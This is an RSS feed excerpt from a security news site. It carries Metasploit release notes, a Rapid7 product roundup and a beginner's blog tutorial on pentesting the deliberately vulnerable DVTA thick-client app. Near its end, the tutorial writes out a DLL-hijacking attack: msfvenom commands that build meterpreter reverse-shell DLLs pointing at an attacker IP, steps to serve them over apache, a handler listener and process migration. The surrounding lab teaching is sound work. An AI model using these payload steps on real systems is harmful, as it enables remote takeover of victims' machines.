href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-04-08T15%3A01%3A17Z..2026-04-16T14%3A22%3A51%2B01%3A00%22">Pull Requests 6.4.126...6.4.128</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.126...6.4.128">Full diff 6.4.126...6.4.128</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Thick Client Pentest for Kiddos]]></title>
<description><![CDATA[Let us start with the kiddoHey Hackers , darshanhackz this side an Ethical Hacker as well as a Novice Security Researcher. Cause i haven’t done a big gig up till now. So what we are going to see today ?? [ Such a fool person , already the title is telling us].So let us understand what is differen...]]></description>
<link>https://tsecurity.de/de/3427118/hacking/thick-client-pentest-for-kiddos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3427118/hacking/thick-client-pentest-for-kiddos/</guid>
<pubDate>Sun, 12 Apr 2026 20:57:01 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*SRpKB1JS3hKeRWB8HhH2uA.png"><figcaption>Let us start with the kiddo</figcaption></figure><p>Hey Hackers , <a href="https://linktr.ee/darshanhackz">darshanhackz</a> this side an Ethical Hacker as well as a Novice Security Researcher. Cause i haven’t done a big gig up till now. So what we are going to see today ?? [ Such a fool person , already the title is telling us].</p><p>So let us understand what is difference between the Thick Client and Thin Client. So that you will get idea what we are going to perform today. Even if you don’t have any idea about the Windows API, Sys-calls, Windows Binaries, Penetration Testing. Still you don’t need to worry about that cause we are going to have this article in a such way that every kiddo will understand it by reading stuff.</p><blockquote><strong>DISCLAIMER:</strong> We are going to do only this for learning purpose there is not any sort of bad intention of writing this articles.</blockquote><p>[ Such a fool man , we are only going to have the recon and base stuff , a novice guide, why to add disclaimer]</p><p>Anyways.</p><p>Lets us understand about the both of the clients.</p><p><strong>Thin Client Pentest :</strong> <br>A thin client is nothing but a web application where we will have most of the logic run on the server , whereas we will get the display data only within the client side itself.</p><p><strong>Characteristic :</strong></p><ul><li>It will run in the browser.</li><li>This will you the HTTP Request and Response Methods.</li><li>Very small resources running at client side.</li><li>TIP : Intercept and Manipulate the Request and Response.</li></ul><h4><strong>Thick Client Pentest :</strong></h4><p>Within thick client [ Also known as Fat Client ] the application is running logics within the client side itself. Now you will be like … Whaattt ?? Yes. I also had a same reaction.</p><p><strong>Characteristic :</strong></p><ul><li>Application installed Locally into the system.</li><li>All the process are going to run into the local machine.</li><li>It will communication with the server / database.</li><li>TIP : We need to analyse the application [ Code , Design , Flaw ].</li></ul><blockquote>Within the thick client application there might be different type of technology that you will deal with. Mostly it will be .Net , C/C++, Java Applet, Native Android &amp; IOS.</blockquote><h4><strong><em>Let us Understand the Architecture.</em></strong></h4><p>See the application might be the 2-tier or 3-tier. Within the 2-tier application there will be “Application” → “Database” this connection will work. Here the communication will be by app and database only directly.</p><p>Within the 3-tier application there will be “Application” → Server ← “Database”. The middle layer of the server relies in between Application and database.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/303/1*t0tSYo5fKrds3WqmDfSt9A.png"></figure><p>Let us understand the flaw :</p><pre>[ User ]<br>   ↓<br>[ Presentation Layer ]<br>   ↓<br>[ Business Logic Layer ]  ← (Runs locally ⚠️)<br>   ↓<br>[ Local Storage ]         ← (Files / DB / Registry)<br>   ↓<br>[ Communication Layer ]   ← (HTTP / TCP)<br>   ↓<br>[ Backend Server ]<br>   ↓<br>[ Database ]</pre><p>At the client side the user will connect via presentation layer. Here there will be the component of the GUI [ Such as the button , forms , Dashboards ], Input fields, Local Rendering Logics.</p><p>Then it will connect to the core layer of the thick client application that is the <strong>Business Logic Layer</strong> where Data Processing, Decision Making , Validation Rules , Authorization Check will done and all this process execute in the local env.</p><p>For storing the data we have the local storage, Here as a part of local storage we will have :</p><ul><li>Database : SQLite, Local DB.</li><li>Windows Registry.</li></ul><p>Sometime the application may do some of the communication with file transfer or may connect to internet for the authorization or flow of the data to sync on the backup server. so for this reason the application connect to the Communication Layer.</p><p>Now let us start with the pentest. So as a part of the practice we are going to use the Open Source Thick Client Practice Tool i.e., DVTA ( Damn Vulnerable Thick Client Application ).</p><h4>Tool URL :</h4><p><a href="https://github.com/srini0x00/dvta">https://github.com/srini0x00/dvta</a></p><p>Once we have this application we will start with the basic analysis.</p><blockquote>NOTE : We are not going to setup the database, cause we are not going to have the dynamic analysis of the application. but will tell you a way.</blockquote><p>[ Those who want to do the dynamic analysis , they must connect the database. for that purpose a user must install the SQL Server and SQL Server Management Studio. You can setup this tool by watching the video present in the git url. But i am not gonna install this all due to less resource and much more lengthy blog. will do it in another blog]</p><h4>Let us understand what this application have.</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*btXbhvx55mnDaEt3flLG1A.png"></figure><p>This much files you will get when you extract the DVTA Application. but the path of the file will be within : ..\..\Application\DVTA\DVTA\bin\Release. Release Directory contains all the application data. Within the above screenshot we can able to observe there is a file <a href="http://dvta.ee/">DVTA.e</a>xe file. Now we will open this file in the notepad. [ Basically if we observe that file is a config file ].</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GFhqeTPZlmFy0jmxhA4riw.png"></figure><h4>Inside sus part we got :</h4><ul><li>Public Token.</li><li>DBServer Address.</li><li>DBusername</li><li>DBpassword</li><li>AESkey</li><li>IV ; used for the encryption algorithm to store the password.</li><li>FTP server address.</li></ul><p>As we got this much information about the application via config file , which stored directly in the application url directly. So as an attacker i can able to take the benefits of this all information to get into the application and tamper the data.</p><h4>Let us see how our application looks.</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*eqoPUYChwYYdaGk_odumHA.png"></figure><p>We have this traditional login page with the register user too. Now we will try to check the register page too.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*T4AttxqO3ll4v4AfnS7aug.png"></figure><p>So the application is having the register page , now sus content :</p><ul><li>Not having the input validations.</li><li>The Username and Password Policy is not enforced.</li><li>email id input also not configured properly.</li></ul><p>Now let us decompile the application to understand the application code and functions as well as the callbacks those are vulnerable. Here we will use the dnspy as the Reverse Engineering Tool / decompiler of the application. The dnspy will decompile the binary and will give us the high language c# code. So will delve throughout that code for the better understanding of the application as well as to search out for the sus [vulnerability] part.</p><ul><li>Open dnspy → Import “DVTA” → Start Analysis.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7yLrs0dF1wWKnwlFkQjl5A.png"></figure><p>Here if you observe within the dnspy we have pulled the “DVTA” binary. Now let us click on “DVTA.exe” → “DVTA”.</p><p>within the first directive we will get all the endpoints [Functions / Class Tree] those are present into the application. [ present on the above screenshot].</p><h4>Now explore the “Admin” Function / Class Tree.</h4><p>Within the “Admin” Tree we will get the multiple functions, here we will focus on the button. Within this application the button will have the ‘btnftp_click’ Class.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vIAw6kjXsyOb3TdplOAmKQ.png"></figure><p>When we explore this function we found some sensitive information about the ftp server passkey. where as we also able to get the data storing file name, i.e, p@ssw0rd , admin.csv</p><p>Also after observing the above function we can able to get another mapping of the functions. Cause this application using multiple user created methods which are calling in the on class.</p><p>If you observe this btn_ftp Class here we can see one DBAccessClass() method is calling out to make an connection. So there might be chance the application is connecting via that method. Let us open that method.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*V0Yqn90cQKMKKWmdK1l4cA.png"></figure><p>We found out that within this callback we got another decryptPassword() method, which is stored openly. here with the help of the function a user can able to bypass the password. Cause if we know how the decryption of the username and password is went throughout the whole application then definitively attacker can able to exploit by creating the side channel script so that we can able to get the account access.</p><p>Let explore the Login → btnLogin_Click.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*V0Yqn90cQKMKKWmdK1l4cA.png"></figure><p>Now if you observe this function. the data is storing into the windows registry. So Here we can able to perform the <strong>Authentication Bypass</strong> by just changing the values into the register. within this code there is registryKey method object is used to store the value and also there is condition for the login i.e, isLoggedIn , true. So if we change this to non authenticated user , from false to true. then that user will directly get an access to the authentication. In this way by observing source code only we figure out that the user will directly get the account access without auth.</p><p>In this way we can able to perform the reverse engineering of the application. If you have a time then invest more into the source code review that we have perform just now to get the most of the vulnerabilities.</p><p>Let us explore more <strong>Information Gathering</strong> with the help of the some other tools. Here as a part of the Information Gathering what agenda we should be clear :</p><ul><li>Need to explore the functionality of the application.</li><li>Architecture of the application</li><li>Clients network communication record.</li><li>Files hat can be accessed by the client.</li><li>Look of the sus type of files / juicy files.</li></ul><p>Let us explore binary with the CFF Explore , Sysinternals Suite , Wireshark tools.</p><h3><strong>CFF Explore :</strong></h3><p>This tool help us to understand about the PE files. What is <strong>PE</strong> files, Portable Executables defines the structure used to load the program into memory , this help us to understand how the code is getting executed, the import &amp; Export , detected packets.</p><p>It will help us for the inspection of :</p><ul><li>.exe executables</li><li>.dll Dynamic Link Libraries</li><li>.sys drivers.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*n0MxXIh2q3NYc_7N5JHo_g.png"></figure><p>String View :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Iy6__Kw_NTLAmcQSrB4HvA.png"></figure><p>Imported data :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Iy1fI3w9E7YaIj_vNGhjUg.png"></figure><p>In this way we can able to check the imported data, resource directory, Debug data directory etc.</p><p>Now we are going to use the multiple tools from the sysinternal tools.</p><h4>strings.exe →</h4><p>This will help us to extract the strings from the binary. We will focus on the sensitive data like:</p><ul><li>username</li><li>password</li><li>APIs</li><li>Token</li><li>IP Address</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*O8-Pk79Tm3tsSDvRRmCwmA.png"></figure><p>With the help of the above command you will find the multiple sensitive data. that we have found within our dnspy likewise too.</p><h4>Now we are going to use the Process Hacker.</h4><p>Process Hacker will help us to identify the more information about the process that is running into the memory. Here we are just gonna run the DVTA Application and we are going to understand what process it is taking.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*bHAgamjz4Qs2EnIiFdZbmg.png"></figure><p>Now are going to observe from which memory location the supporting libraries this application taking the dll. So we will take the benefits from this execution &amp; will try to create the dll injection or hijacking according dll.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8NqQohsWM_XatqPk3bFolQ.png"></figure><p>If we observe the complete structure of the application where the complete release stored then only we are going to observe which specific dll this application required.</p><h3>EXTRAS :</h3><p>Let us open the release directory of the DVTA application.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Hjxu_qojyJN6HGCrWjhDcg.png"></figure><p>If we observe here this file will take the supporting dll to connect here those are : DBAccess.dll , ExcelLibrary.dll this are the dll will take by the DVTA Application. Here we can able to create the DBAccess.dll with the malicious DLL and we are going to create the malicious dll within our kali linux.</p><p>within your linux you need to use the metasploit framework to create the malicious dll with the below command.</p><p>[ I know we are only going to perform the static analysis , but here i am just giving you another small trick for the dll hijacking method ].</p><pre>root@hacker# msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Attacker_IP&gt; LPORT=1234 -a x86 -f dll &gt; DBAccess.dll</pre><p>Or else we can add the required dll that is taken by this application i.e, SECUR32.dll</p><pre>root@hacker# msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;Attacker_IP&gt; LPORT=1234 -a x86 -f dll &gt; SECUR32.dll</pre><p>Cause this dll will be the dll which is running into the application , it is nothing but a supporting dll file which is required by this application.</p><p>Now we are going to start our apache server.</p><pre>root@hacker# cp SECUR32.dll /var/www/html <br>root@hacker# service apache2 start</pre><p>Now within the victim machine we will download this dll file in the “Release” folder of the thick client application.</p><p>After Saving and installing this file into the release folder, we are going to run our C2 server.</p><pre>root@hacker# msfconsole <br>root@hacker# use exploit/multi/handler <br>root@hacker# set payload windows/meterpreter/reverse_tcp <br>root@hacker# show options <br>// SET EVERYTHING<br>root@hacker# exploit</pre><p>And you will have the access of the dll file.</p><p>Now next step is to do the migration. [ Means even if the victim close the process still we will have the access of the reverse shell.</p><pre>root@hacker# migrate [pid of mal dll]</pre><p>After migration the process which is running into the windows will be deleted but still we will have the conversation and active session.</p><p>There are other lots of thing within the dynamic analysis. Where we are going to see alot such as the ;</p><ul><li>MITM Proxy</li><li>Procmon</li><li>ILSpy + Reflexil.</li><li>Complete Systeinternal</li></ul><p>Within the Thick Client Pentest we will also have some security header check scanner such as the <strong>Visual Studio Gripper</strong> this tool will do the automation scan and will try to find the vulnerability within the application.</p><p>So that set for this article soon i will give you a random testing of the random thick client application so that we will learn static as well as dynamic application penetration testing too.</p><blockquote>Thank You for reading the complete article , make sure you follow me on <a href="https://www.linkedin.com/in/darshan-naik-73b870204/">LinkedIn</a> , <a href="https://x.com/darshanhackz">X</a> , <a href="https://linktr.ee/darshanhackz">Linktree</a>.</blockquote><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=0ca03892f7db" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/thick-client-pentest-for-kiddos-0ca03892f7db">Thick Client Pentest for Kiddos</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 04/10/2026]]></title>
<description><![CDATA[Speedup Improvements of MSFVenom & New ModulesThis week, we have added new modules to Metasploit Framework targeting Cisco Catalyst SD-WAN controllers and osTicket as well as updates and improvements to Windows service-for-user persistence, and LDAP/ADCS-related modules to automatically report re...]]></description>
<link>https://tsecurity.de/de/3424632/it-security-nachrichten/metasploit-wrap-up-04102026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3424632/it-security-nachrichten/metasploit-wrap-up-04102026/</guid>
<pubDate>Fri, 10 Apr 2026 21:21:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Speedup Improvements of MSFVenom &amp; New Modules</h2><p>This week, we have added new modules to Metasploit Framework targeting Cisco Catalyst SD-WAN controllers and osTicket as well as updates and improvements to Windows service-for-user persistence, and LDAP/ADCS-related modules to automatically report related services resulting in an improved data stream, which can be queried by using the services command.</p><p>We also landed an improvement to msfvenom’s bootup time, thanks to <a href="https://github.com/bcoles">bcoles</a>, resulting in an approximate two-times speedup.</p><h2>New module content (4)</h2><h3>AD/CS Authenticated Web Enrollment Services Module</h3><p>Authors: Spencer McIntyre, bwatters-r7, and jhicks-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20752">#20752</a> contributed by <a href="https://github.com/bwatters-r7">bwatters-r7</a></p><p>Path: admin/http/web_enrollment_cert</p><p>Description: This adds a new auxiliary/admin/http/web_enrollment_cert modules that allows certificates to be issued from an Active Directory Certificate Services Web Enrollment portal. Its usage is the same as the auxiliary/admin/http/icpr_cert module but enables operators to issue certificates when the web enrollment portal is accessible but the MS-ICPR service is not.</p><h3>Cisco Catalyst SD-WAN Controller Authentication Bypass</h3><p>Author: sfewer-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21158">#21158</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a></p><p>Path: admin/networking/cisco_sdwan_auth_bypass</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-20127&amp;referrer=blog">CVE-2026-20127</a></p><p>Description: This adds an auxiliary module to exploit an authentication bypass vulnerability, CVE-2026-20127, affecting Cisco Catalyst SD-WAN Controller. Recently exploited in the wild as a zero-day.</p><h3>osTicket Arbitrary File Read via PHP Filter Chains in mPDF</h3><p>Authors: Arkaprabha Chakraborty &lt;@t1nt1nsn0wy&gt; and HORIZON3.ai Team</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20948">#20948</a> contributed by <a href="https://github.com/ArkaprabhaChakraborty">ArkaprabhaChakraborty</a></p><p>Path: gather/osticket_arbitrary_file_read</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-22200&amp;referrer=blog">CVE-2026-22200</a></p><p>Description: This adds an auxiliary module to exploit, CVE-2026-22200, an authenticated file read vulnerability in osTicket.</p><h3>Windows Service for User (S4U) Scheduled Task Persistence - Event Trigger</h3><p>Authors: Brandon McCann "zeknox" <a href="mailto:bmccann@accuvant.com">bmccann@accuvant.com</a>, Thomas McCarthy "smilingraccoon" <a href="mailto:smilingraccoon@gmail.com">smilingraccoon@gmail.com</a>, and h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20814">#20814</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: windows/persistence/service_for_user/event</p><p>Description: Updates the Windows service-for-user persistence technique.</p><h2>Enhancements and features (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20973">#20973</a> from <a href="https://github.com/bitstr3m-48">bitstr3m-48</a> - This release enables command execution for non-interactive HWBridge sessions via the sessions -c flag. Additionally, the hwbridge/connect module now preserves parsed JSON error bodies from failed HTTP responses, which improves error messaging.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20977">#20977</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This updates the exploit/unix/webapp/php_eval module to have a FORMDATA datastore option, which adds HTTP POST-request support and makes the HEADERS datastore option consistent with other modules.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20979">#20979</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - This updates the exploit/unix/webapp/php_include module with additional datastore options and make its usage more consistent with the similar exploit/unix/webapp/php_eval module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21031">#21031</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Enhances the Metasploit’s LDAP/ADCS-related modules to automatically report related services (LDAP, DCERPC/ICertPassage/ADCS CA) and to improve vulnerability reporting by associating findings with the affected LDAP object’s DN (and, for ADCS template findings, the template name) so results are uniquely keyed and easier to interpret.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21229">#21229</a> from <a href="https://github.com/bcoles">bcoles</a> - This updates the msfvenom utility to use the metadata cache. The result is roughly 2x faster execution times when listing modules.</li></ul><h2>Bugs fixed (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21153">#21153</a> from <a href="https://github.com/Nayeraneru">Nayeraneru</a> - This fixes an issue with some mutable constant datastore options. Using shared options like CHOST or CPORT are not changing visibility across modules anymore.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21221">#21221</a> from <a href="https://github.com/cgranleese-r7">cgranleese-r7</a> - This PR improves module_doc_template.md with examples to better guide contributors.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Missing rn-* label on Github (3)</h2><p><strong>PLEASE ADD RN-TAGS TO THESE PULL REQUESTS BEFORE RELEASING THE WRAP UP, AND RERUN THE WRAPUP SCRIPT</strong></p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/7">#7</a> from <a href="https://github.com/scriptjunkie">scriptjunkie</a> - Not written - add release notes directly to the pull request, then regenerate. Do not edit manually without ensuring the pull request has the release note present.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20814">#20814</a> from <a href="https://github.com/h00die">h00die</a> - Not written - add release notes directly to the pull request, then regenerate. Do not edit manually without ensuring the pull request has the release note present.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21143">#21143</a> from <a href="https://github.com/SaiSakthidar">SaiSakthidar</a> - This bumps the Metasploit payloads to include changes that enable the PHP Meterpreter to open TCP server sockets. This enables operators to listen for inbound connections on compromised hosts and closes a feature gap between PHP and the other Meterpreters.</li></ul><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-04-02T10%3A24%3A13Z..2026-04-08T15%3A01%3A17Z%22">Pull Requests 6.4.125...6.4.126</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.125...6.4.126">Full diff 6.4.125...6.4.126</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s New in Rapid7 Products and Services: Q1 2026 in Review]]></title>
<description><![CDATA[If product releases had a runway moment, Q1 at Rapid7 would’ve walked out in Cloud Dancer; crisp, confident, and quietly powerful, before breaking into a full gallop in the Year of the Horse. At Rapid7, our first-quarter launches combined velocity with refinement: meaningful enhancements designed...]]></description>
<link>https://tsecurity.de/de/3420578/it-security-nachrichten/whats-new-in-rapid7-products-and-services-q1-2026-in-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3420578/it-security-nachrichten/whats-new-in-rapid7-products-and-services-q1-2026-in-review/</guid>
<pubDate>Thu, 09 Apr 2026 15:23:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>If product releases had a runway moment, Q1 at Rapid7 would’ve walked out in Cloud Dancer; crisp, confident, and quietly powerful, before breaking into a full gallop in the Year of the Horse. At Rapid7, our first-quarter launches combined velocity with refinement: meaningful enhancements designed to move security teams faster without adding complexity. Let’s cover off the key launches, one by one.</span></p><h2>Detection and response</h2><h3><span>MDR for Microsoft</span></h3><p><span>Getting more value from the tools you already have is an objective shared by all of us. For many of you, that translates to achieving greater security operations outcomes and resilience from your Microsoft technology. With MDR for Microsoft, organizations correlate their Microsoft, Rapid7, and third-party telemetry with prioritized risk context so the service can anticipate attacks before they start. </span></p><p><span>AI-powered triage and investigations – backed by unlimited incident response that ensures threats are fully eradicated – delivers certainty in an uncertain attack environment. Dedicated advisory provides strategic recommendations and program hardening guidance that drives long-term security resilience. Customers ultimately experience security operations excellence and achieve stronger outcomes from their existing Microsoft foundation.</span></p><p><a href="https://www.rapid7.com/blog/post/dr-microsoft-defender-to-tangible-security-outcomes-with-rapid7-mdr/" target="_blank"><span>Read the blog</span></a><span> to learn more.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2ad03fd30d2b1f10/69d7a05d7cf343638d3ab320/Rapid7-MDR-for-Microsoft-chart.png" alt="Rapid7-MDR-for-Microsoft-chart.png" caption="MDR for Microsoft explained" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Rapid7-MDR-for-Microsoft-chart.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2ad03fd30d2b1f10/69d7a05d7cf343638d3ab320/Rapid7-MDR-for-Microsoft-chart.png" data-sys-asset-uid="blt2ad03fd30d2b1f10" data-sys-asset-filename="Rapid7-MDR-for-Microsoft-chart.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="MDR for Microsoft explained" data-sys-asset-alt="Rapid7-MDR-for-Microsoft-chart.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>MDR for Microsoft explained</figcaption></div></figure><h3><span>Rapid7 acquires Kenzo Security</span></h3><p><span>The</span><a href="https://www.rapid7.com/about/press-releases/rapid7-acquires-kenzo-security-to-accelerate-preemptive-ai-powered-security-operations/" target="_blank"><span> acquisition</span></a><span> of Kenzo Security marks another step forward for the Rapid7 Command Platform and Rapid7’s vision for preemptive, AI-powered security operations. In an environment where most security teams are forced to leave large volumes of alerts uninvestigated, Kenzo’s agentic AI capabilities are expected to help accelerate Rapid7 from AI-assisted workflows toward AI-driven, machine-speed operations. Designed around specialized AI agents that work together across security operations tasks, this technology has the potential to reduce manual strain, broaden investigative coverage, and deliver more consistent, precise outcomes.</span></p><p><span>An average Kenzo</span><a href="https://www.kenzo.security/blog-posts/truework-case-study" target="_blank"><span> customer</span></a><span> reported a 94% reduction in investigation time, and their alert coverage increased from 12% to 100%. As these capabilities are brought into MDR, Managed Threat Complete, InsightIDR, and Incident Command, customers will benefit from a stronger, more scalable approach to cyber defense.</span></p><h3><span>Incident Command</span></h3><h4><span>User to Identity mapping</span></h4><p><span>Connecting user activity to full identity context is critical for faster, more confident investigations. With User to Identity mapping in Incident Command, analysts can seamlessly link SIEM users to their corresponding identity profiles, gaining instant visibility into MFA status, account posture, and group memberships. By unifying detection and exposure data, teams eliminate manual reconciliation and close visibility gaps across the identity attack surface. This enables faster triage, deeper insight into user risk, and a complete, connected view of identity-driven threats.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0a7323da895c88b3/69d7a16a456d618d452fa742/user-to-identity-mapping-rapid7-incident-command.png" alt="user-to-identity-mapping-rapid7-incident-command.png" caption="User to Identity mapping within Incident Command" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="user-to-identity-mapping-rapid7-incident-command.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0a7323da895c88b3/69d7a16a456d618d452fa742/user-to-identity-mapping-rapid7-incident-command.png" data-sys-asset-uid="blt0a7323da895c88b3" data-sys-asset-filename="user-to-identity-mapping-rapid7-incident-command.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="User to Identity mapping within Incident Command" data-sys-asset-alt="user-to-identity-mapping-rapid7-incident-command.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>User to Identity mapping within Incident Command</figcaption></div></figure><h4><br><span>AI-Powered Log Entry Summary</span></h4><p><span>AI-powered Log Entry Summary brings instant clarity to even the most complex log data. By translating raw log lines into a simple “who, what, when, where, and why” framework, analysts can quickly uncover insights without needing to interpret vendor-specific syntax or business logic. This removes the cognitive burden from investigations and hunts, allowing teams to spot threats faster across all data sources. Teams benefit from accelerated triage, more efficient investigations, and smarter decisions driven by clear, actionable context.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4f120b43e0e0170/69d7a1b2a145312b9275bfda/ai-powered-log-entry-summary.png" alt="ai-powered-log-entry-summary.png" caption="Instant context with AI Log Entry summary" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="ai-powered-log-entry-summary.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4f120b43e0e0170/69d7a1b2a145312b9275bfda/ai-powered-log-entry-summary.png" data-sys-asset-uid="bltf4f120b43e0e0170" data-sys-asset-filename="ai-powered-log-entry-summary.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Instant context with AI Log Entry summary" data-sys-asset-alt="ai-powered-log-entry-summary.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Instant context with AI Log Entry summary</figcaption></div></figure><h2>Exposure management</h2><h4><span>Cloud Runtime Security (application detection and response)</span></h4><p><span>Earlier this year, we made a significant </span><a href="https://www.rapid7.com/blog/post/cds-reducing-cloud-chaos-rapid7-partners-with-armo-delivering-cloud-runtime-security/" target="_blank"><span>announcement</span></a><span> that Rapid7 had partnered with ARMO to add AI-powered cloud application detection and response (CADR) – or cloud runtime security – to our cloud security portfolio. We are thrilled to announce that these capabilities are now integrated with Rapid7 Exposure Command Ultimate. For our customers, this milestone represents our ability to deliver on the promise of a complete cloud-native application protection platform (CNAPP) that helps security teams preemptively identify and proactively thwart attacks. If you’re interested in learning more about this latest innovation to our cloud security portfolio, reach out to one of our account executives.</span></p><p><span></span></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5b3c45d25144a013/69d7a1f2a14531797c75bfde/cloud-runtime-security-rapid7.png" alt="cloud-runtime-security-rapid7.png" caption="Runtime security delivering real-time visibility across cloud-native and containerized workloads" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="cloud-runtime-security-rapid7.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5b3c45d25144a013/69d7a1f2a14531797c75bfde/cloud-runtime-security-rapid7.png" data-sys-asset-uid="blt5b3c45d25144a013" data-sys-asset-filename="cloud-runtime-security-rapid7.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Runtime security delivering real-time visibility across cloud-native and containerized workloads" data-sys-asset-alt="cloud-runtime-security-rapid7.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Runtime security delivering real-time visibility across cloud-native and containerized workloads</figcaption></div></figure><h4><span>Top Remediation Report in Remediation Hub</span></h4><p><span>Understanding which remediations to prioritize is only part of the process, teams also need asset-level detail to act. Top Remediations Report adds that context in Remediation Hub, with customizable filters, shared visibility across teams, and automated scheduling for recurring delivery to key stakeholders in CSV, HTML, or PDF. The result is faster coordination, clearer ownership, and quicker remediation progress.</span></p><h4><span>Remediation Bulk Export API</span></h4><p><span>We understand that organizations need to customize reporting for various stakeholders and levels across their business to drive effective vulnerability remediation and communicate security posture. One of the ways that organizations address this need is through our powerful cloud-based API, which enables teams to extract and export large amounts of security data into external tools like Tableau or PowerBI. Customers can export security data at scale, including 